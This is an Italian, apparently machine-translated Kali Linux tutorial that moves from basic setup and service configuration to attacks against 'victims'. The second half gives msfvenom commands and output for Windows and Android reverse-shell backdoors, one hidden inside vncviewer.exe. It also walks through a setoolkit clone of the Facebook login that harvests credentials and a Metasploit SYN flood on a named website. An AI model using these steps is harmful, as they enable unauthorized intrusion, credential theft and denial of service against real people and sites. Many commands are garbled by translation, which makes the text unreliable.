Nozioni di base Kali Linux

Nozioni di base Kali Linux
Kali Linux è una distribuzione basata su Debian per hacker etici, tester di penetrazione, ricercatori di sicurezza e appassionati. È stabile, aggiornato, pronto per le imprese, open source e ben mantenuta dalla sicurezza offensiva. L'ambiente desktop predefinito di Kali Linux è gnome ma offre anche una varietà di altri ambienti desktop tra cui KDE, Mate, LXDE e altri. Può essere installato su vari tipi di sistemi tra cui laptop, server, dispositivi ARM (Raspberry Pi ecc.) E Cloud. Ha anche una versione portatile per dispositivi Android chiamati Nethunter che può essere utilizzato all'interno del sistema operativo Android e viene fornito con strumenti e script preinstallati che offrono la portabilità mentre eseguono audit di sicurezza o test di penetrazione.

Perché dovresti usare Kali Linux?

Kali Linux è utilizzato principalmente da tester di penetrazione, revisori di sicurezza, ricercatori e ricercatori forensi. Ha quasi tutti gli strumenti o lo script preinstallati che possono essere utilizzati per uno qualsiasi degli scopi di cui sopra. Puoi usare Kali Linux per crack WiFi Networks, per eseguire Open Source Intelligence (OSINT) su qualcuno, per hackerare siti Web e reti e molti altri.

Oltre all'hacking etico, Kali Linux ha anche una serie di strumenti per l'indagine forense. La forense è un'altra filiale di sicurezza importante ed emergente il cui scopo principale è quello di raccogliere e analizzare le prove di un'attività criminale e quindi di tornare indietro. L'indagine forense aiuta a rintracciare e rimuovere effetti dannosi (backdoor, malwares) è derivato da un'attività criminale e calcolando/gestisce la perdita dopo un attacco informatico. Kali Linux ha una modalità live invisibile separata per le operazioni "forensi" in cui non lascia l'impronta digitale sul sistema host.

Mettersi a proprio agio con l'ambiente di Kali

Kali non è realizzato per utenti ordinari e non è molto user-friendly come Windows o Ubuntu. Il suo ambiente predefinito è root, il che non è molto facile da usare ed è piuttosto pericoloso per Noobs. Manca anche alcune utility di base come SNAP, VirtualBox e altre utility che sono presenti in Ubuntu.

Prima cosa prima

La prima cosa da fare è creare un utente non root

root@kali: ~# adduser kali
Aggiunta di "kali" dell'utente ..
Aggiunta di un nuovo gruppo "Kali" (1002) ..
Aggiunta di un nuovo utente "Kali" (1002) con il gruppo "Kali" ..
Creazione di Home Directory '/Home/Kali' ..
Copia di file da "/etc/skel" ..
Nuova password:
... Snip ..
root@kali: ~# usermod -ag sudo kali
Inizializza il database PostgreSQL di Metasploit Framework
root@kali: ~# msfdb init
Creazione dell'utente del database 'MSF'
Immettere la password per il nuovo ruolo:
Inseriscilo di nuovo:
Creazione di database 'msf' e 'msf_test'
... Snip ..

Aggiungi le seguenti righe al tuo “/etc/apt/fonti.Elenco "file

deb http: // http.Kali.Org/Kali Kali Rolling Main Contributo non libero
# Per l'accesso al pacchetto di origine, rimborso la seguente riga
# deb-src http: // http.Kali.Org/Kali Kali Rolling Main Contributo non libero
Installa alcuni altri strumenti utili.
root@kali: ~# apt -get update && apt upgrade -y
root@kali: ~# apt-get Installa VirtualBox VirtualBox-Dkms Gobuster Tor Tor-Browser
OpenVPN Htop Atom Deepin -Terminal Tilix -y

Gestire i servizi predefiniti di Kali

Kali viene fornito con molti servizi non standard preinstallati come PostgreSQL, MySQL, SSH, HTTP. Se non configurati correttamente, questi servizi avranno inizio come un processo di fondo quando il tuo Kali Linux si avvia e queste porte aperte possono essere una minaccia per la sicurezza del tuo sistema.

In questa sezione, esamineremo come funzionano questi servizi e come puoi configurarli correttamente e come usarli. Il modo standard di configurazione di uno strumento o di un servizio viene letto il suo file di docum. Il file README contiene la procedura standard per configurare e utilizzare uno strumento o un servizio. I file README si trovano di solito nella cartella "/usr/share/doc/[strumento_name]/readme".

Servizio Shell Secure (SSH)

Secure Shell (SSH) è stato utilizzato a lungo come strumento standard per eseguire a distanza comandi, file di trasferimento e altri scopi di amministrazione remoto. Il pacchetto include SSH (client) e SSHD (servizio) per controllare le altre macchine in remoto.

Il servizio SSH non viene avviato per impostazione predefinita quando Kali si avvia, è possibile avviarlo digitando,

root@kali: ~ $ SERVIZI SSH Avvia
root@kali: ~ $ netstat -antp | grep -i sshd
TCP 0 0 0.0.0.0:22 0.0.0.0:* Ascolta 6601/SSHD
TCP6 0 0 ::: 22 :::* Ascolta 6601/SSHD

Se vuoi che sshd inizi ogni volta quando i tuoi kali si avvolgono. Tipo

root@kali: ~ $ update-rc.d ssh abilita

Se vuoi che qualcuno accedi al tuo PC tramite SSH, utilizzerà il nome utente e la password del tuo Kali per l'autenticazione di accesso. Quindi è meglio cambiare la password predefinita "Toor" in qualcosa di sicuro.

root@kali: ~ $ passwd
Modifica della password per root.
Password attuale:
Nuova password:
Riprovare la nuova password:
Passwd: password aggiornata correttamente

Ora ricarica il servizio SSH per influire sulle modifiche

root@kali: ~ $ service ssh ricarica

Servizio HTTP

Il servizio HTTP è molto vantaggioso durante l'esecuzione di attività correlate all'hacking etico. Può essere utilizzato per ospitare pagine Web e sito Web di phishing falsi, per trasferire file a server delle vittime remote. Con le applicazioni Web che diventano più popolari ogni giorno, ora è più importante avere conoscenze per comprendere e gestire i server HTTP come Apache.

Apache è un server HTTP che viene preinstallato in Kali. Il servizio HTTP di Apache è disabilitato per impostazione predefinita, ma è possibile avviarlo utilizzando il comando seguente.

root@kali: ~ $ servizio apache2 avvia

Apache ospiterà la sua pagina Web Deful predefinita sul dominio locale alla porta HTTP standard 80. Vai su http: // localhost: 80/

Per iniziare ogni volta quando inizia il tuo kali, digita

root@kali: ~ $ update-rc.d apache2 abilita

È inoltre possibile configurare Apache sulla porta non standard modificando il suo file di configurazione (/etc/apache2/porte.conf)

root@kali: ~ $ nano/etc/apache2/porte.conf

Salva il file e quindi esegui

root@kali: ~ $ servizio apache2 riavvio

Ora, Apache sarà server sulla porta "1234" anziché sulla porta standard 80.

Se si desidera leggere la documentazione completa di Apache Server, visitare la directory “/usr/share/doc/apache2/”, digita

root@kali: ~ $ cd/usr/share/doc/apache2/
root@kali:/usr/share/doc/apache2 $ gzip -decomprime readme.Debian.Gz
root@kali:/usr/share/doc/apache2 $ nano readme.Debian

Un elenco di alcuni comandi utili

individuare viene utilizzato per individuare un file in Linux, prima di utilizzare questo comando, è necessario aggiornare prima il database

root@kali: ~# aggiornatob
root@kali: ~# localizza uqjhssvf.jpeg
/root/uqjhssvf.jpeg

Trovare è più aggressivo e non si basa sul database. Cerca ricorsivamente il file nella directory e nelle sue sottodirectory.

root@kali: ~# trova ./ -name main.Py
./Desktop/main.Py

Wget Può essere utilizzato per scaricare una pagina Web o un file nel terminale.

root@kali: ~# wget tinytuba.com
--2019-05-11 08: 58: 48-- http: // tinytuba.com/
Risoluzione di Tinytuba.com (tinytuba.com)… 52.216.129.66
Connessione a Tinytuba.com (tinytuba.com) | 52.216.129.66 |: 80 ... collegato.
Richiesta http inviata, in attesa di risposta ... 200 ok
Lunghezza: 1551 (1.5K) [Testo/HTML]
Salvataggio su: 'indice.html '
indice.HTML 100%[==========================>] 1.51k --.-Kb/s in 0s
2019-05-11 08:58:50 (56.5 mb/s) - 'indice.Html 'salvato [1551/1551]
root@kali: ~# indice Firefox.html

superiore Ti dà informazioni sulla tua CPU, sull'utilizzo della memoria e su altre statistiche.

storia Mostra l'elenco dei comandi precedenti che hai inserito nel tuo terminale.

Alcuni altri comandi utili che puoi trovare su Internet sono LS, RM, RMDIR, Adduser, Deluser, Service, Nano, Cat, More, Less, Uname, Whoami eccetera

Generare backdoor dannosi

Puoi generare binari exe dannosi usando "msfvenom" kali linux e installarli sul sistema di qualcun altro per controllarlo in remoto.

root@kali: ~ $ msfvenom -a x86 -platform windows -b '\ x00' -p Windows/MeterPreter/reverse_tcp
Lhost = [indirizzo IP dell'attaccante] lport = [porta dell'attaccante n.] -F exe> divertimento.exe
Trovati 11 encoder compatibili
Tentare di codificare il carico utile con 1 iterazioni di x86/shikata_ga_nai
x86/shikata_ga_nai è riuscito con la dimensione 368 (iterazione = 0)
x86/shikata_ga_nai scelto con dimensione finale 368
Dimensione del payload: 368 byte
Dimensione finale del file EXE: 73802 byte
root@kali: ~ $ ls divertimento.exe
divertimento.exe
root@kali: ~ $ file divertente.exe
divertimento.EXE: PE32 Executable (GUI) Intel 80386, per MS Windows

Per generare backdoor per i sistemi di Windows di architettura X64, digita il seguente comando.

root@kali: ~ $ msfvenom -platform windows -b '\ x00' -p Windows/x64/meterpreter/reverse_tcp
Lhost = [indirizzo IP dell'attaccante] lport = [porta dell'attaccante n.] -F exe> divertimento.exe
[-] Nessun arco selezionato, selezione dell'arco: x64 dal payload
Trovati 3 encoder compatibili
... Snip ..
root@kali: ~ $ file divertente.exe
divertimento.EXE: PE32+ Executable (GUI) X86-64, per MS Windows

Incorporare backdoor in applicazioni legittime usando kali

Puoi anche incorporare il tuo codice backdoor dannoso in un file exe innocuo come Adobe Reader Installer o alcuni per leggi multimediali. L'eseguibile retrodoored risultante sembrerà un'applicazione software legittima, ma quando eseguita sul computer della vittima, eseguirà la tua backdoor dannosa insieme a quella legittima applicazione, con conseguente compromesso del PC della vittima.

Ci sono alcuni eseguibili Windows già presenti in Kali Linux, che useremo per dimostrazione.

root@kali: ~ $ ls/usr/share/windows-binaries/
backdoors/ exe2bat.exe fport/ klogger.exe nbtenum/ plink.exe vncviewer.exe whoami.exe
enumplus/ fgdump/ hyperion/ mbenum/ nc.exe radmin.exe wget.exe

Inietteremo il nostro carico utile in "Vncviewer.Exe ”eseguibile.

root@kali: ~ $ msfvenom -a x86 -Platform Windows -x/usr/share/windows -binaries/vncviewer.exe
-k -p windows/meterpreter/reverse_tcp lhost = [attaccante] lport = [porta dell'attaccante]
-E x86/shikata_ga_nai -i 3 -b "\ x00" -f exe -o vncviewer.exe
Trovati 1 encoder compatibile
Tentare di codificare il carico utile con 3 iterazioni di x86/shikata_ga_nai
... Snip ..
Dimensione del payload: 422 byte
Dimensione finale del file EXE: 421376 byte
Salvato come: vncviewer.exe

Generare backdoor Android

Per controllare a distanza i telefoni Android, è possibile generare file APK dannosi utilizzando MSFvenom.

root@kali: ~ $ msfvenom -p android/meterpreter/reverse_tcp lhost = [IP dell'attaccante]
Lport = [porta dell'attaccante no] r> qualunque cosa.APK
[-] Nessuna piattaforma è stata selezionata, scegliendo msf :: module :: piattaforma :: Android dal payload
[-] Nessun arco selezionato, selezione dell'arco: Dalvik dal payload
Nessun encoder o BadChars specificato, che produce payload non elaborato
Dimensione del payload: 10087 byte

Ingegneria sociale usando setoolkit

L'ingegneria sociale è l'uso dell'inganno per indurre qualcuno a rivelare le loro informazioni riservate o personali che possono essere utilizzate in modo improprio per scopi dannosi.

La tecnica più comunemente usata di ingegneria sociale è il phishing, in cui si tenta di inviare messaggi, e -mail o chiamate telefoniche per ottenere informazioni personali, in particolare le informazioni relative al denaro. Nell'attacco di phishing, il ricevitore di un'e -mail è convinto di aver ricevuto l'e -mail da una fonte autentica come una banca o un dipartimento governativo, e poi ingannato per rivelare le sue credenziali sensibili.

In questa dimostrazione, cloneremo una pagina di accesso di Facebook utilizzando setoolkit e ospiterà quella pagina sul nostro server HTTP, quindi invieremo l'indirizzo IP del nostro server HTTP alla vittima. Quando le vittime accedono alla nostra falsa pagina di accesso a Facebook, questa pagina invierà il suo nome utente e la sua password alla nostra macchina Kali.

Tipo setoolkit Nel terminal, verrà aperto setoolkit

  • Selezionare dal menu: [Seleziona 1] Attacchi di ingegneria sociale
  • Selezionare dal menu: [Seleziona 2] Vettori di attacco del sito Web
  • Selezionare dal menu: [Seleziona 3] Metodo di attacco della mietitrice credenziale
  • Seleziona dal menu: [Seleziona 2] Sito Cloner
  • Seleziona dal menu: immettere l'indirizzo IP del computer locale
  • Seleziona dal menu: immettere l'URL per clone: ​​www.Facebook.com
  • Premere Invio e digitare y

Quando la vittima inserisce il nostro indirizzo IP nel suo browser, gli verrà presentata la nostra falsa pagina di accesso di Facebook che abbiamo creato in precedenza. Dobbiamo aspettare fino a quando la vittima entra nel suo nome utente e password nella nostra pagina clonata. La pagina Facebook falsa sembrerà così,

Finché l'utente inserisce le sue credenziali, Setoolkit le mostrerà sul terminale.

Questa demo era sulla rete locale, se vuoi farlo su PI pubblico, è necessario eseguire il trasferimento di porte sul router o puoi utilizzare NGROK per l'IP pubblico e il numero di porta.

Denial of Service (DOS) Attack con Metasploit

L'attacco Denial of Service (DOS) è un tipo di attacco a un sistema o una rete che diminuisce o limita l'accessibilità delle risorse di sistema ai suoi utenti legittimi. Lo scopo di un attacco DOS non è quello di rubare informazioni sensibili, invece l'attaccante cerca di inondarsi il sistema delle vittime con richieste di servizi non legali per sovraccaricare le proprie risorse.

Un attacco di negazione del servizio distribuito (DDoS) necessita di un gran numero di sistemi (indicati come zombi) che attaccano un singolo bersaglio, con conseguente negazione del servizio. Un singolo attacco DOS non può influire su grandi server e reti aziendali, ecco perché DDoS è più efficace e letale. È anche difficile rintracciare e bloccare l'attacco DDOS perché centinaia e migliaia di sistemi di zombi attaccano un singolo host.

Sono molti strumenti e script disponibili per gli attacchi DOS e DDoS, ma useremo un modulo ausiliario di Metasploit per la dimostrazione. Cercheremo di abbattere un sito Web di esempio "www.Jarusa.com ".

Innanzitutto, vai su https: // www.isitdownRightNow.com/ e conferma che il sito Web è attivo e in esecuzione

Il sito web è scaduto. Ora, Open Metasploit Framework Console nel tuo terminale.

root@kali: ~ $ msfconsole
... Snip ..
MSF5> Usa ausiliario/dos/tcp/synflood

Scoprire www.Jarusa.comIndirizzo IP e impostalo come rhost e poi esegui l'attacco

Dopo un po ', vedrai che il sito Web non è disponibile. Confermalo usando https: // www.isitdownRightNow.com/

CONCLUSIONE

Kali Linux è una casa per gli hacker etici e questo tutorial ti abbia illuminato alle basi di Kali Linux, cosa può fare e come iniziare con il suo utilizzo.